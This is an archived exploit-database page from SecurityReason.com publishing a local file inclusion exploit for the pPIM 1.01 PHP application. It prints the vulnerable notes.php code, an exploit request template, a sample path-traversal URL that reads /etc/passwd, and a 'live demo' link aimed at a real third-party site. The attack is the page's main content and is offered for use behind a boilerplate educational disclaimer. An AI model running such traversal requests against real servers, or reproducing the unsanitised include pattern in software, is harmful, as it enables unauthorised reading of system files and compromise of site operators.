SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow ExploitAlert Database

Arrow  Topic :

pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability


Arrow  ExploitAlert : 4849
  SecurityAlert : 4390 (Exploit Details)
  Milw0rm ID : 6667
Arrow  Credit : JosS
Arrow  Date : 06.10.2008

Arrow   Download

Arrow   Plain text version


Arrow  Exploit Code :  

# pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability
# url: http://www.phlatline.org/docs/files/ppim.zip
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.


description of vulnerability:
-----------------------------------------------
the variable 'id' has been not defined in code
and the variable 'id' is sent by the users.
-----------------------------------------------

vuln file: notes.php

vuln code:
x: >...
107: if (isset($_GET["mode"]))

{

if ($_GET["mode"]=="edit")

{

if (isset($_GET['id']))

{

$notefile = $_GET['id'];

if ($notefile == "new")

{

$title = "";

$notes = "";

}

else

{

$temp = "notes/" . $notefile;

require($temp);

123: }
x: <...
x: }}}

exploit: GET /notes.php?mode=edit&id=[file]
sample (xpl):
http://www.localhost.com/notes.php?mode=edit&id=../../../../../../../../../
../etc/passwd

live demo:
http://www.phlatline.org/docs/demos/ppim/notes.php?mode=edit&id=../notes.ph
p





Arrow  Feedback :

If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.